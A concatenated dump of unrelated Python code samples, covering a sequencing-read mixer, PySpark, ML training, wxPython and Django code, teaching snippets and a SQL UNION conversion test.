if watch and not callback:
raise RuntimeError(
"You must provide a callback when watching a process."
)
output = None
if shell:
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
else:
proc = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE)
if background:
# Let task run in background and return pmid for monitoring:
return proc.pid, proc
if watch:
while proc.poll() is None:
line = proc.stdout.readline()
if line != "":
callback(line)
# Sometimes the process exits before we have all of the output, so
# we need to gather the remainder of the output.
remainder = proc.communicate()[0]
if remainder:
callback(remainder)
else:
output = proc.communicate()[0]
if callback and output is not None:
return callback(output)
return output
class ArtificialMixture(PoreLogger):
""" Composes artificial mixtures of host and pathogen sequence reads """
def __init__(self, composition: dict, reads: int = 10000, verbose: bool = False):
""" Composes artificial mixtures of host and pathogen reads
:param composition: dictionary: {'host': {file='host.fq', proportion=0.90}}
:param reads: total number of reads to compose
"""
PoreLogger.__init__(self, level=logging.INFO if verbose else logging.ERROR)
self.composition = composition
self.reads = reads
self.check_proportions()
self.fastq: dict = self.prepare_fastq()
def prepare_fastq(self) -> dict:
""" Checks file paths of input files and creates indices """
fastq = {}
for organism, data in self.composition.items():
file = data['file']
file_path = Path(file)
if not file_path.exists():
raise ValueError(f'File {file_path} does not exist.')
else:
fastq[organism] = pyfastx.Fastq(file)
self.logger.info('Prepared read files - proceeding')
return fastq
def check_proportions(self):
""" Check that proportions in composition file sum to 1"""
proportions = [
v['proportion'] for k, v in self.composition.items()
]
if sum(proportions) < 1.0:
raise ValueError('Sum of proportions between host and pathogen must be 1.0.')
elif sum(proportions) > 1.0:
raise ValueError('Sum of proportions between host and pathogen allocations cannot exceed 1.0')
else:
self.logger.info('Sum of proportions equals 1.0 - proceeding')
def compose(self, fout: Path, shuffle: bool = True):
""" Compose an artifical mixture of reads
Read names / decription headers are renamed according to sequentially numbered
keys in the composition file, e.. saureus_0, saureus_1 ... to better distinguish
between composition components later.
:param fout: file path to output fastq
:param shuffle: shuffle reads before writing
"""
self.logger.info('Sample and mix read data')
reads_out = []
for organism, fastq in self.fastq.items():
read_names = [read.name for read in fastq] # need to solve iterator for sampling, names avoid memory
sampled_read_names = self.sample(read_names, reads=int(
self.composition[organism]['proportion']*self.reads)
) # check if integer conversion can reduce total reads
read_strings = self.rename_headers(
reads=[fastq[name] for name in sampled_read_names],
organism=organism
)
reads_out += read_strings
if shuffle:
self.logger.info('Shuffle output reads')
random.shuffle(reads_out)
self.logger.info(f'Write reads to: {fout}')
with fout.open('w') as out:
for read_str in reads_out:
out.write(read_str + '\n')
self.clean()
def clean(self):
""" Clean up the Fastq index files from Pyfastx """
for _, data in self.composition.items():
index_file = Path(data['file'] + '.fxi')
if index_file.exists():
index_file.unlink()
@staticmethod
def rename_headers(reads: list, organism: str):
""" Rename read headers from the Pyfastx reads (read-only) """
i = 0
read_strings = []
for read in reads:
read_str = read.raw.splitlines()
read_str[0] = f'@{organism}_{i}'
read_str = '\n'.join(read_str)
read_strings.append(read_str)
i += 1
return read_strings
@staticmethod
def sample(fastq: list, reads: int = None, replacement: bool = False):
""" Sample a list of Fastq reads / read names """
if replacement:
sampled_reads = random.choices(fastq, k=reads)
else:
sampled_reads = random.sample(fastq, k=reads)
return sampled_reads
def create_fastx_index(fastx: Path) -> (pyfastx.Fasta, Path):
if is_fasta(fastx):
return pyfastx.Fasta(
str(fastx), build_index=True
), Path(str(fastx) + '.fxi')
elif is_fastq(fastx):
return pyfastx.Fastq(
str(fastx), build_index=True
), Path(str(fastx) + '.fxi')
else:
raise ValueError(
f'Could not determine input file format: {fastx}'
)
def is_fasta(fastx: Path):
with fastx.open() as fin:
return fin.readline().startswith('>')
def is_fastq(fastx: Path):
with fastx.open() as fin:
return fin.readline().startswith('@')
def color_tree(
data: str,
color_branches: bool = True,
template: str = "itol.color.txt",
output: Path = Path('itol.color.txt')
):
"""
:param tree:
:param data: formatted string to insert into template for data block
:param color_branches:
:param template:
:param output:
:return:
"""
template_loader = jinja2.FileSystemLoader(
searchpath=f"{Path(__file__).parent / 'templates'}"
)
template_env = jinja2.Environment(loader=template_loader)
template = template_env.get_template(template)
rendered = template.render(
data=data,
color_branches=1 if color_branches else 0
)
with output.open('w') as fh:
fh.write(rendered)
def smart_open(filename: str or Path = None, mode: str = "w"):
if filename and filename != '-':
if isinstance(filename, str):
fh = open(filename, mode)
else:
fh = filename.open(mode)
else:
fh = sys.stdout
return fh
def set_nested_item(data_dict: dict, key_list: tuple or list, value):
"""Set item in nested dictionary"""
reduce(getitem, key_list[:-1], data_dict)[key_list[-1]] = value
return data_dict
def modify_model_priors(model_priors, model_prior, tag, prefix):
for mp in model_prior:
mp_nest = mp.split(":")
mp_path, mp_val = mp_nest[:-1], mp_nest[-1]
model_priors = set_nested_item(model_priors, mp_path, mp_val)
if tag:
prefix += f"_{mp}"
return model_priors
|
22,443 | e9a6577000a4929dfc0d2c6412a058ee95c6c185 | import sys
from pyspark import SparkContext, SparkConf
conf = SparkConf().setMaster("local").setAppName("sort")
sc = SparkContext(conf = conf)
lines = sc.textFile(sys.argv[1])
word = lines.flatMap(lambda x : x.split(", ")).filter(lambda x: x!='').cache()
count = word.map(lambda x: (int(x), 1)).cache()
sortedCount = count.sortByKey().cache()
for(num, unitcount) in sortedCount.collect():
print(num)
sc.stop()
|
22,444 | bfb35a09eabaa7e7465489739714d56f2052a334 | import decimal
# Data Type
x = 2
y = 0.1
flag = False
c = 'a'
foo = 'foo'
print(type(x))
print(type(y))
print(type(flag))
print(type(True))
print(type(c))
print(type(foo))
print(type([]))
print(x.__class__)
print(1 == True)
print(True + True)
# Decimal
print(2 - 1.8)
print(decimal.Decimal('2') - decimal.Decimal('1.8'))
# Type Conversion
print(type(str(10)))
print(type(int('1')))
# Type Inference
if isinstance(foo, str):
print('foo is a String')
|
22,445 | 933417c3e68f617829ff0d56e8cc95271a822dcc | from collections import namedtuple
from typing import Optional, Union, Dict, List
import mlflow
import pandas as pd
import numpy as np
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import RepeatedStratifiedKFold, GridSearchCV, cross_val_predict, train_test_split
from config import settings
from process_and_ml.ml_flow_control import create_experiment
from process_and_ml.models import compute_metrics
from process_and_ml.pipeline import preprocessing_baseline, cat_features_fill_na, show_metrics_baseline
from pathlib import Path
path = (
Path('.') if Path('.').resolve().name == 'arvato_project'
else Path('..')
)
path_mlflow = path / 'mlruns'
mlflow.set_tracking_uri(str(path_mlflow))
Features = namedtuple('Features', 'X_train X_test X_valid')
Labels = namedtuple('Labels', 'y_train y_test y_valid')
def evaluate(label, trained_model, pred=None):
prediction = trained_model.predict_proba(pred)
acc = trained_model.predict(pred)
roc_pred = roc_auc_score(label, prediction[:1])
print(f'Prediction accuracy = {acc}')
print(f'Prediction roc = {roc_pred} !')
return prediction[:1], roc_pred, acc
def log_best(run: mlflow.entities.Run,
metric: str) -> None:
"""Log the best parameters from optimization to the parent experiment.
Args:
run: current run to log metrics
metric: name of metric to select best and log
"""
client = mlflow.tracking.MlflowClient()
runs = client.search_runs(
[run.info.experiment_id],
"tags.mlflow.parentRunId = '{run_id}' ".format(run_id=run.info.run_id))
best_run = min(runs, key=lambda run: run.data.metrics[metric])
mlflow.set_tag("best_run", best_run.info.run_id)
mlflow.log_metric(f"best_{metric}", best_run.data.metrics[metric])
def update_weights(x, y, d19):
...
class CatPipeline:
def __init__(self, df: pd.DataFrame, label: bool):
self.df = df
self.label = label
self.features = None
self.labels = None
self.model = None
self.class_weights = None
self.X_train = None
self.X_valid = None
self.y_train = None
self.y_valid = None
self.X_test = None
self.y_test = None
self.cat_features = None
self.metrics_returned = None
self.non_wrangler_sequence(df)
def non_wrangler_sequence(self, df: pd.DataFrame):
self.cat_features = df.select_dtypes(include=['category', 'object']).columns
self.features, self.labels = preprocessing_baseline(df,
cat_features=self.cat_features,
target='is_customer')
self.X_train, self.X_test, self.X_valid = self.features
self.y_train, self.y_test, self.y_valid = self.labels
self.class_weights = (1, sum(self.y_train == 0) / sum(self.y_train == 1))
def predict_test(self, test_df: pd.DataFrame):
lnr = test_df['LNR']
test_df_cleaned = cat_features_fill_na(test_df.drop(columns=['LNR'], errors='ignore'),
cat_features=self.cat_features)
return evaluate(lnr, test_df_cleaned)
def train(self, model, params, tags, run_name: Optional[str], experiment_name: str):
self.model = model(**params)
experiment_id = create_experiment(experiment_name=experiment_name)
with mlflow.start_run(tags=tags, run_name=run_name, experiment_id=experiment_id):
mlflow.log_params(params)
self.model.fit(self.X_train, self.y_train, eval_set=(self.X_valid, self.y_valid), verbose=False)
self.metrics_returned = show_metrics_baseline(self.model, features=self.features, labels=self.labels)
mlflow.log_metrics(self.metrics_returned)
class TrainAfterPipeline:
def __init__(self, dataset: np.array, label: np.array):
self.dataset = dataset
self.label = label
self.trained_model = False
self.X_train = None
self.y_train = None
self.X_test = None
self.y_test = None
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.dataset, self.label.values,
random_state=settings.RANDOM_STATE,
test_size=0.3)
def train_grid_search(self, model, grid: Dict[str, Union[str, float, List[Union[str, int, float]]]]):
cv = RepeatedStratifiedKFold(n_splits=20, n_repeats=3, random_state=settings.RANDOM_STATE)
grid_search = GridSearchCV(estimator=model, param_grid=grid, n_jobs=-1, cv=cv, scoring='roc_auc', verbose=2)
grid_result = grid_search.fit(self.X_train, self.y_train)
print(grid_result.best_score_)
print(grid_result.best_estimator_)
compute_metrics(grid_result.best_estimator_, self.X_test, self.y_test)
return grid_result
def train(self, model, params, tags, run_name: Optional[str], experiment_name: str, data: Optional[Dict[str, np.array]]=None):
model = model(**params)
experiment_id = create_experiment(experiment_name=experiment_name)
if not data:
x = self.X_train
y = self.y_train
else:
x = data['x']
y = data['y']
with mlflow.start_run(tags=tags, run_name=run_name, experiment_id=experiment_id):
mlflow.log_params(params)
model.fit(x, y)
split_acc, split_auc = compute_metrics(model, self.X_test, self.y_test)
mlflow.log_metrics({'acc': split_acc, 'auc': split_auc})
return model
|
22,446 | dd3beae2288b6ab0d2a8d9c50ca90fd4e995bf6c | import datetime
import os
import sys
import types
import config.settings
# create config object corresponding to specified env
ENV = os.environ.get('ENV', 'Base')
_current = getattr(sys.modules['config.settings'], '{0}Config'.format(ENV))()
def set_attrs():
# copy attributes to the module for convenience
for atr in [f for f in dir(_current) if '__' not in f]:
# environment can override anything
val = os.environ.get(atr, getattr(_current, atr))
setattr(sys.modules[__name__], atr, val)
set_attrs()
def as_dict():
res = {}
for atr in [f for f in dir(config) if (('__' not in f) and (not f.startswith('_')))]:
val = getattr(config, atr)
if all(map(lambda x: not isinstance(val, x), [types.ModuleType, types.FunctionType])):
res[atr] = val
return res
|
22,447 | 2ef6e862e868fab8e364f18c755cc3c66e79181e | import os
import sentry_sdk
def setup_sentry():
sentry_sdk.init(os.getenv('SENTRY_DSN'))
|
22,448 | 0a9669e7dfa24fe0cd1259361ec7da0fcc7f9b6f | import numpy as np
a=np.array([[0.0,0.0,0.0],[10.0,10.0,10.0],[20.0,20.0,20.0],[30.0,30.0,30.0]])
b=np.array([1.0,2.0,3.0])
print("first array ",a)
print("seconda array",b)
print(a+b)
print(a-b)
print(a*b)
print(a/b)
|
22,449 | a72ea9c7118e68d9202333bc29dd6c629bcbd946 | 1 迭代器
什么是可迭代对象(Iterable)?
可以直接作用于for循环的对象统称为可迭代对象,即Iterable。
# 一是集合数据类型,如list、tuple、dict、set、str等;
# 二是generator,包括生成器和带yield的generator function。
什么又是迭代器(Iterator)?
可以被next()函数调用并不断返回下一个值(直到没有数据时抛出StopIteration错误)的对象称为迭代器,即Iterator。
Python的Iterator对象表示的是一个数据流,Iterator对象可以被next()函数调用并不断返回下一个数据,直到没有数据时抛出StopIteration错误。
# 可以把这个数据流看做是一个有序序列,但我们却不能提前知道序列的长度,只能不断通过next()函数实现按需计算下一个数据,
# 所以Iterator的计算是惰性的,只有在需要返回下一个数据时它才会计算。
# Iterable 可以通过iter()函数转换得到 Iterator
2 生成器
generator 就是 iterator 的一种,以更优雅的方式实现的 iterator 。
3 装饰器
什么是装饰器(Decorator)?
本质上:是一个返回函数的高阶函数。
生产上,什么时候用装饰器?
当我们想要给一个函数func()增加某些功能,但又不希望修改func()函数的源代码的时候就需要用装饰器了。(在代码运行期间动态增加功能)
装饰器例子:
[root@svn py]# cat zsq.py
#!/bin/env python
#coding:utf-8
import functools ### 函数工具模块
def login(func):
"""
在这里新定义一个高阶函数,
这就是decorator
"""
@functools.wraps(func) ### Python内置的functools.wraps()使 带有装饰器的函数的name属性保持不变
def wrapper(*args, **kwargs):
user = "hzq" ### 假设这是数据库中的用户名和密码
passwd = "123"
username = raw_input("输入用户名:")
password = raw_input("输入密码:")
if username == user and password == passwd:
return func(*args, **kwargs) ### 此处返回home(),因为对于任意函数,
else: 都可以通过类似func(*args,**kw)的形式调用它,无论它的参数是如何定义的。
print("用户名或密码错误。")
return wrapper
@login ### 利用python的@语法,把decorator置于home函数的定义处 相当于home = login(home)
def home():
print("欢迎来到XX首页!")
home()
print(home.__name__) ### 不使用functools.wraps()时,home的__name__属性变为了wrapper,使用后仍为home
|
22,450 | aeb1775f49957146e6f829a85ab706a585f8acd0 | /Users/hirata/anaconda3/lib/python3.6/tokenize.py |
22,451 | d7811002457ed9d46a470e6e78f15be5a16e1049 | #!/usr/bin/env python
# encoding: utf-8
import wx
import wx.lib.scrolledpanel as scrolled
from constants import *
import QLiveLib
from Widgets import TransportButtons, CueButton, QLiveControlKnob
class SetInterpTimeDialog(wx.Dialog):
def __init__(self):
wx.Dialog.__init__(self, None, size = (200, 120))
panel = wx.Panel(self)
knob = QLiveControlKnob(self, 0.01, 300, pos = (5,5))
button = wx.Button(self,label="set All" , pos = (60, 65))
button.Bind(wx.EVT_BUTTON, self.onSetAll)
def onSetAll(self, e):
value = knob.GetValue()
if QLiveLib.getVar("MainWindow") != None:
pass
# QLiveLib.getVar("FxTracks").cueEvent(value)
self.Close()
class CueEvent:
def __init__(self, type, current, old, total):
self.type = type
self.current = current
self.old = old
self.total = total
def getType(self):
return self.type
def getCurrent(self):
return self.current
def getOld(self):
return self.old
def getTotal(self):
return self.total
class ControlPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent, size=(95, -1), style=wx.SUNKEN_BORDER)
self.mainSizer = wx.BoxSizer(wx.VERTICAL)
self.newAddSizer = wx.BoxSizer(wx.HORIZONTAL)
self.upDownSizer = wx.BoxSizer(wx.HORIZONTAL)
self.learnButton = None
self.buttons = TransportButtons(self,
playCallback=QLiveLib.getVar("AudioServer").start,
recordCallback=QLiveLib.getVar("AudioServer").record)
self.mainSizer.Add(self.buttons, 0, wx.ALIGN_CENTER_HORIZONTAL)
self.mainSizer.Add(wx.StaticLine(self, size=(1, 1)), 0,
wx.EXPAND|wx.LEFT|wx.RIGHT|wx.BOTTOM, 5)
title = wx.StaticText(self, label="-- CUES --")
self.mainSizer.Add(title, 0, wx.ALIGN_CENTER, 5)
#button = wx.Button(self,wx.ID_OK, label="Interp Time" )
#self.mainSizer.Add(button, 0, wx.ALIGN_CENTER, 5)
#button.Bind(wx.EVT_BUTTON, self.onSetInterpTime)
bmp = wx.Bitmap(ICON_ADD, wx.BITMAP_TYPE_PNG)
self.newButton = wx.BitmapButton(self, wx.ID_ANY, bmp)
self.newButton.Bind(wx.EVT_BUTTON, self.onNewCue)
self.newAddSizer.Add(self.newButton, 1)
bmp = wx.Bitmap(ICON_DELETE, wx.BITMAP_TYPE_PNG)
self.delButton = wx.BitmapButton(self, wx.ID_ANY, bmp)
self.delButton.Bind(wx.EVT_BUTTON, self.onDelCue)
self.newAddSizer.Add(self.delButton, 1)
self.mainSizer.Add(self.newAddSizer, 0, wx.EXPAND|wx.ALL, 5)
self.upbmp = wx.Bitmap(ICON_ARROW_UP, wx.BITMAP_TYPE_PNG)
self.upmidbmp = wx.Bitmap(ICON_ARROW_UP_MIDI, wx.BITMAP_TYPE_PNG)
self.upButton = wx.BitmapButton(self, wx.ID_ANY, self.upbmp)
self.upButton.Bind(wx.EVT_BUTTON, self.onMoveCueUp)
self.upButton.Bind(wx.EVT_RIGHT_DOWN, self.midiLearn)
self.upTooltip = wx.ToolTip("")
self.upButton.SetToolTip(self.upTooltip)
self.upDownSizer.Add(self.upButton, 1)
self.downbmp = wx.Bitmap(ICON_ARROW_DOWN, wx.BITMAP_TYPE_PNG)
self.downmidbmp = wx.Bitmap(ICON_ARROW_DOWN_MIDI, wx.BITMAP_TYPE_PNG)
self.downButton = wx.BitmapButton(self, wx.ID_ANY, self.downbmp)
self.downButton.Bind(wx.EVT_BUTTON, self.onMoveCueDown)
self.downButton.Bind(wx.EVT_RIGHT_DOWN, self.midiLearn)
self.downTooltip = wx.ToolTip("")
self.downButton.SetToolTip(self.downTooltip)
self.upDownSizer.Add(self.downButton, 1)
self.mainSizer.Add(self.upDownSizer, 0,
wx.EXPAND|wx.LEFT|wx.RIGHT|wx.BOTTOM, 5)
self.SetSizerAndFit(self.mainSizer)
def onDelCue(self, evt):
QLiveLib.getVar("CuesPanel").onDelCue()
def onNewCue(self, evt):
QLiveLib.getVar("CuesPanel").onNewCue()
def onMoveCueUp(self, evt):
QLiveLib.getVar("CuesPanel").onMoveCueUp()
def onMoveCueDown(self, evt):
QLiveLib.getVar("CuesPanel").onMoveCueDown()
def moveCueFromMidi(self, which):
if which == "up":
wx.CallAfter(QLiveLib.getVar("CuesPanel").onMoveCueUp)
elif which == "down":
wx.CallAfter(QLiveLib.getVar("CuesPanel").onMoveCueDown)
def midiLearn(self, evt):
obj = evt.GetEventObject()
if self.learnButton is not None and self.learnButton != obj:
if self.learnButton == self.upButton:
wx.CallAfter(self.learnButton.SetBitmapLabel, self.upbmp)
elif self.learnButton == self.downButton:
wx.CallAfter(self.learnButton.SetBitmapLabel, self.downbmp)
server = QLiveLib.getVar("AudioServer")
if self.learnButton == obj:
if obj == self.upButton:
obj.SetBitmapLabel(self.upbmp)
elif obj == self.downButton:
obj.SetBitmapLabel(self.downbmp)
self.learnButton = None
server.stopCueMidiLearn()
else:
if obj == self.upButton:
obj.SetBitmapLabel(self.upmidbmp)
elif obj == self.downButton:
obj.SetBitmapLabel(self.downmidbmp)
self.learnButton = obj
if obj == self.upButton:
which = "up"
elif obj == self.downButton:
which = "down"
server.setCueMidiLearnState(which)
server.startCueMidiLearn()
def setButtonTooltip(self, which, tip):
if which == "up":
self.upTooltip.SetTip(tip)
elif which == "down":
self.downTooltip.SetTip(tip)
def resetCueButtonBackgroundColour(self):
if self.learnButton is not None:
if self.learnButton == self.upButton:
wx.CallAfter(self.learnButton.SetBitmapLabel, self.upbmp)
elif self.learnButton == self.downButton:
wx.CallAfter(self.learnButton.SetBitmapLabel, self.downbmp)
self.learnButton = None
def onSetInterpTime(self, e):
panel = SetInterpTimeDialog()
panel.ShowModal()
class CuesPanel(scrolled.ScrolledPanel):
def __init__(self, parent=None, size=(95, 500)):
scrolled.ScrolledPanel.__init__(self, parent, size=size, style=wx.SUNKEN_BORDER)
self.currentCue = 0
self.cueButtons = []
self.mainSizer = wx.BoxSizer(wx.VERTICAL)
self.SetSizer(self.mainSizer)
self.appendCueButton()
def setSelectedCue(self, number):
if number >= 0 and number < len(self.cueButtons):
if self.currentCue < len(self.cueButtons):
self.cueButtons[self.currentCue].select(False)
self.cueButtons[number].select(True)
self.currentCue = number
self.SetupScrolling(scroll_x=False, scroll_y=True, scrollToTop=False)
self.mainSizer.Layout()
self.ScrollChildIntoView(self.cueButtons[self.currentCue])
return True
else:
return False
def clearButtons(self):
for button in self.cueButtons:
self.mainSizer.Remove(button)
button.Destroy()
self.cueButtons = []
self.mainSizer.Layout()
def appendCueButton(self):
number = len(self.cueButtons)
butHeight = self.GetTextExtent("9")[1] + 8
but = CueButton(self, size=(50, butHeight), number=number,
evtHandler=self.onCueSelection)
self.mainSizer.Add(but, 0, wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT, 5)
self.cueButtons.append(but)
self.setSelectedCue(number)
def sendCueEvent(self, evt):
if QLiveLib.getVar("MainWindow") != None:
QLiveLib.getVar("FxTracks").cueEvent(evt)
QLiveLib.getVar("Soundfiles").cueEvent(evt)
def onCueSelection(self, x):
old = self.currentCue
if self.setSelectedCue(x):
evt = CueEvent(type=CUE_TYPE_SELECT, current=self.currentCue,
old=old, total=len(self.cueButtons))
self.sendCueEvent(evt)
def loadCurrentCue(self):
evt = CueEvent(type=CUE_TYPE_SELECT, current=self.currentCue,
old=None, total=len(self.cueButtons))
self.sendCueEvent(evt)
def onDelCue(self):
button = self.cueButtons.pop(self.currentCue)
button.Destroy()
self.mainSizer.Layout()
if len(self.cueButtons) == 0:
self.appendCueButton()
for i, but in enumerate(self.cueButtons):
but.setNumber(i)
deletedCue = self.currentCue
if self.currentCue > 0:
selection = self.currentCue - 1
else:
selection = 0
if self.setSelectedCue(selection):
evt = CueEvent(type=CUE_TYPE_DELETE, current=self.currentCue,
old=deletedCue, total=len(self.cueButtons))
self.sendCueEvent(evt)
def onSaveCue(self):
evt = CueEvent(type=CUE_TYPE_SAVE, current=self.currentCue,
old=None, total=len(self.cueButtons))
self.sendCueEvent(evt)
def onNewCue(self):
old = self.currentCue
self.appendCueButton()
evt = CueEvent(type=CUE_TYPE_NEW, current=self.currentCue,
old=old, total=len(self.cueButtons))
self.sendCueEvent(evt)
def getNumberOfCues(self):
return len(self.cueButtons)
def getCurrentCue(self):
return self.currentCue
def onMoveCueUp(self):
self.onCueSelection(self.currentCue - 1)
def onMoveCueDown(self):
self.onCueSelection(self.currentCue + 1)
def setSaveDict(self, dict):
self.clearButtons()
for i in range(dict["numberOfCues"]):
self.appendCueButton()
self.setSelectedCue(0)
def getSaveDict(self):
dict = {}
dict["numberOfCues"] = len(self.cueButtons)
return dict
|
22,452 | e4de5a62e1097c20338959ec0b6dcc212f89200f | from django.db import models
from post.utils import unique_slug_generator
from django.db.models.signals import pre_save
class Tag(models.Model):
title=models.CharField(max_length=150)
slug=models.SlugField(blank=True)
date=models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.title
def tag_save(sender, instance, *args, **kwargs):
if not instance.slug:
instance.slug = unique_slug_generator(instance)
pre_save.connect(tag_save,sender=Tag) |
22,453 | 622e1e82fd8ce9298f3312fe1b205785dcb468f4 | import math
import random
from sqlalchemy.orm.collections import mapped_collection
from .maps import Map
from .foods import Food
from .pheromones import Pheromone
from .templates import db, GameState
import pdb
class World(GameState):
"""The world object which controls the game states for a player."""
colonies = db.relationship('Colony', backref='world')
"""All colonies ('players') which exist in this world."""
ants = db.relationship('Ant', backref='world')
"""All ants that exist in this world."""
foods = db.relationship('Food', backref='world')
"""All foods which exist in this world."""
age = db.Column(db.Integer)
"""How long this world has been running for."""
width = db.Column(db.Integer)
"""The horizontal size of the world."""
height = db.Column(db.Integer)
"""The vertical size of the world."""
maps = db.relationship('Map', collection_class=mapped_collection(lambda _map: (_map.x, _map.y)), backref='world')
"""The mapping of objects in the world to their coordinates."""
pheromones = db.relationship('Pheromone',
collection_class=mapped_collection(lambda _pheromone: (_pheromone.colony_id,
_pheromone.x,
_pheromone.y)),
backref='world')
"""The mapping of pheromones in the world to their coordinates."""
def __init__(self, width=50, height=50):
self.age = 0
self.width = width
self.height = height
def add_object(self, object_to_be_added):
"""Adds the object to this world.
Args:
object_to_be_added (Object): The object to be added to the world.
"""
new_mapping = Map.add_object(self.id, object_to_be_added)
if new_mapping:
object_to_be_added.save()
new_mapping.ref_id = object_to_be_added.id
return True
else:
return False
def remove_object(self, object_to_be_removed):
"""Removes the object from this world.
Args:
object_to_be_removed (Object): The object to be removed.
"""
Map.remove_object(object_to_be_removed)
object_to_be_removed.query.delete()
def get_object_at_location(self, x, y):
"""Returns the object located at given coordinates.
Args:
x (int): X coordinate
y (int): Y coordinates
Returns:
Object: The object located at those coordinates. None if nothing exists there.
"""
object_map_at_target_location = self.maps.get((x, y))
if not object_map_at_target_location:
return None
return object_map_at_target_location.get_real_object()
def generate_food(self):
"""Creates a food object randomly somewhere in this world."""
x = random.randint(0, self.width)
y = random.randint(0, self.height)
new_food = Food(self.id, x, y)
food_created = self.add_object(new_food)
if not food_created:
existing_object = self.get_object_at_location(x, y)
if isinstance(existing_object, Food):
existing_object.value += 1
def add_pheromone_trail(self, colony_id, old_x, old_y, x, y):
existing_trail = self.pheromones.get((colony_id, x, y))
if not existing_trail:
degrees = (math.degrees(math.atan2(old_y - y, old_x - x))) % 360
new_trail = Pheromone.add_pheromone(self.id, 1, x, y, 'food-path', degrees, 1)
elif existing_trail.colony_id == 1:
existing_trail.strength += 1
|
22,454 | 93cf90969d21af641fff4c7e9ab326799aaca9e0 | # Generated by Django 3.2.15 on 2023-06-02 18:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('judgment', '0005_auto_20230602_2004'),
]
operations = [
migrations.AddField(
model_name='event',
name='accept_court',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='event',
name='court',
field=models.ForeignKey(default=1, help_text='Select the court where this case was heard.', on_delete=django.db.models.deletion.CASCADE, to='judgment.court'),
),
]
|
22,455 | 765c943b327a62eb7ff55e76acac8c53485c6e9d | import random
print('The Number Guessing Game')
no=random.randint(1,10)
print ('guess a number between 1 to 10')
chances=0
while(chances<3):
guess=int(input('enter your guess '))
if(guess==no):
print('Congratulations! You won')
break
elif(guess<no):
print('Please guess a higher number! ', guess)
else:
print('Please guess a lower number! ',guess)
chances=chances+1
if(chances==3):
print('Sorry you loose') |
22,456 | 0f0a9cdbadccddec207030e99d2d12413d9e3d78 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
集合的使用:
Python中的集合跟数学上的集合是一致的,不允许有重复元素,而且可以进行交集、并集、差集等运算。
"""
# 创建集合的字面量语法
set1 = {1, 2, 3, 3, 3, 2}
print(set1)
print('Length = ', len(set1))
# 创建集合的构造器语法(面向对象部分会进行详细讲解)
set2 = set(range(1, 10))
set3 = set((1, 2, 3, 3, 3, 2))
print(set2, set3)
# 创建集合的推导式语法(推导式也可以用于推导集合)
set4 = {num for num in range(1, 100) if num % 3 == 0 or num % 5 == 0}
print(set4)
print('-'*100)
print('set1:', set1)
print('set2:', set2)
print('set3:', set3)
# 向集合添加元素和从集合删除元素。
set1.add(4)
set1.add(5)
set2.update([11, 12])
print('set2:', set2)
set2.discard(5)
print('set2:', set2)
if 4 in set2:
set2.remove(4)
print('set1:', set1)
print('set2:', set2)
print(set3.pop())
print('set3:', set3)
print('-'*100)
print('set1:', set1)
print('set2:', set2)
print('set3:', set3)
# 集合的成员交集、并集、差集等运算:
# 交集
print(set1 & set2)
# print(set1.intersection(set2))
# 并集
print(set1 | set2)
# print(set1.union(set2))
# 差集:set1 - 交集
print(set1 - set2)
# print(set1.difference(set2))
# 对称差运算:并集 - 交集
print(set1 ^ set2)
# print(set1.symmetric_difference(set2))
print('-'*100)
print('set1:', set1)
print('set2:', set2)
print('set3:', set3)
# 判断子集和超集
print(set2 <= set1)
# print(set2.issubset(set1))
print(set3 <= set1)
# print(set3.issubset(set1))
print(set1 >= set2)
# print(set1.issuperset(set2))
print(set1 >= set3)
# print(set1.issuperset(set3)) |
22,457 | 36691b35815c1ce4df2208ebacb2277c52f000ba | =======================================================
#####################
### Original Python2 File:
### union.py2
#####################
#!/usr/bin/env python2.py
for i in range(10):
print i,
print
sql:
CREATE TABLE Customers (
name VARCHAR(100) ,
last VARCHAR(15),
phone int
)
INSERT INTO Customers VALUES ('Phil', 'Cannata', 7735647)
INSERT INTO Customers VALUES ('Matthew', 'Clarkson', 9875643)
INSERT INTO Customers VALUES ('Joaquin', 'Casares', 3451878)
INSERT INTO Customers VALUES ('Joaquin', 'Joaquin', 9345879)
INSERT INTO Customers VALUES ('Miggh', 'Tyfine', 124967)
INSERT INTO Customers VALUES ('Joaquin', 'Joaquin', 5123789)
INSERT INTO Customers VALUES ('Joaquin', 'Guadalupe', 8845748)
CREATE TABLE new_Customers (
name VARCHAR(100),
last VARCHAR(15),
phone int,
birthday int
)
INSERT INTO new_Customers VALUES ('Lake', 'Travis', 911, 1)
INSERT INTO new_Customers VALUES ('Absente', 'Mee', 302740, 8)
INSERT INTO new_Customers VALUES ('Burbple', 'Durple', 8837232, 7)
INSERT INTO new_Customers VALUES ('Hes', 'ABob', 8675309, 2)
INSERT INTO new_Customers VALUES ('See', 'Mee', 302740, 1)
INSERT INTO new_Customers VALUES ('Matthew', 'Clarkson', 9875643, 5)
INSERT INTO new_Customers VALUES ('Jose', 'Nosey', 928223, 2)
INSERT INTO new_Customers VALUES ('Miggh', 'Tyfine', 124967, 2)
SELECT * FROM Customers
UNION
SELECT * FROM new_Customers
SELECT name, last FROM Customers
UNION
SELECT name, last, phone FROM new_Customers
SELECT name, last, phone FROM Customers
UNION
SELECT name, last FROM new_Customers
SELECT name, phone FROM Customers
UNION
SELECT name, last FROM new_Customers
SELECT name, last FROM Customers
UNION
SELECT birthday, last FROM new_Customers
SELECT name, last FROM Customers
UNION
SELECT name, last FROM new_Customers
:sql
list = sql:
SELECT name, last, phone FROM Customers
UNION
SELECT name, last, phone FROM new_Customers
:sql
print list
#sql:
SELECT last, name FROM Customers
UNION
SELECT last, name FROM new_Customers
:sql
=======================================================
### Converted Python File:
#!/usr/bin/env python2.py
for i in range(10):
print i,
print
[['Phil', 'Cannata'], ['Matthew', 'Clarkson'], ['Joaquin', 'Casares'], ['Joaquin', 'Joaquin'], ['Miggh', 'Tyfine'], ['Joaquin', 'Joaquin'], ['Joaquin', 'Guadalupe'], ['Lake', 'Travis'], ['Absente', 'Mee'], ['Burbple', 'Durple'], ['Hes', 'ABob'], ['See', 'Mee'], ['Jose', 'Nosey']]
